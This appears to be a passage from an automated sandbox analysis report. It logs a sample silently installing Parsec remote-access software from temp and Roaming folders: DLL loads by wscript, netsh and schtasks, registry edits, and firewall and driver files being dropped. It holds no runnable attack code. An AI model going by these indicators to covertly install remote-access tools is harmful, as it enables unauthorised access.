Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: apphelp.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: wtsapi32.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: msi.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: sas.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: windows.storage.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: wldp.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: msasn1.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: cryptsp.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: rsaenh.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: cryptbase.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: gpapi.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: cryptnet.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: profapi.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: iphlpapi.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: winnsi.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: winhttp.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: ondemandconnroutehelper.dll
Source: C:\Program Files\Parsec\pservice.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
Source: Parsec.lnk.13.drLNK file: ..\..\..\..\..\..\Program Files\Parsec\parsecd.exe
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpWindow found: window name: TMainFormJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpAutomated click: Install
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpAutomated click: Next
Source: C:\Users\user\AppData\Local\Temp\is-ADGVN.tmp\uu8v4UUzTU.tmpAutomated click: Next
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeAutomated click: Next >
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\ParsecJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscriptsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\firewall-add.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\firewall-remove.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\legacy-cleanup.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\service-install.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\service-kill-parsec.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\wscripts\service-remove.vbsJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vusbJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vusb\parsec-vud.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vddJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\vdd\parsec-vdd.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\teams.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\parsecd.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\pservice.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\skelJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\skel\parsecd-150-93b.dllJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\skel\appdata.jsonJump to behavior
Source: C:\Users\user\AppData\Roaming\PSecWin\parsec-windows.exeDirectory created: C:\Program Files\Parsec\uninstall.exeJump to behavior
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconc.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\nefconw.exe
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbinstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\vusbuninstall.bat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvusba\parsecvusba.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.cat
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.inf
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\parsecvirtualds\parsecvirtualds.sys
Source: C:\Program Files\Parsec\vusb\parsec-vud.exeDirectory created: C:\Program Files\Parsec Virtual USB Adapter Driver\uninstall.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\nefconw.exe
Source: C:\Program Files\Parsec\vdd\parsec-vdd.exeDirectory created: C:\Program Files\Parsec Virtual Display Driver\vddinstall.bat
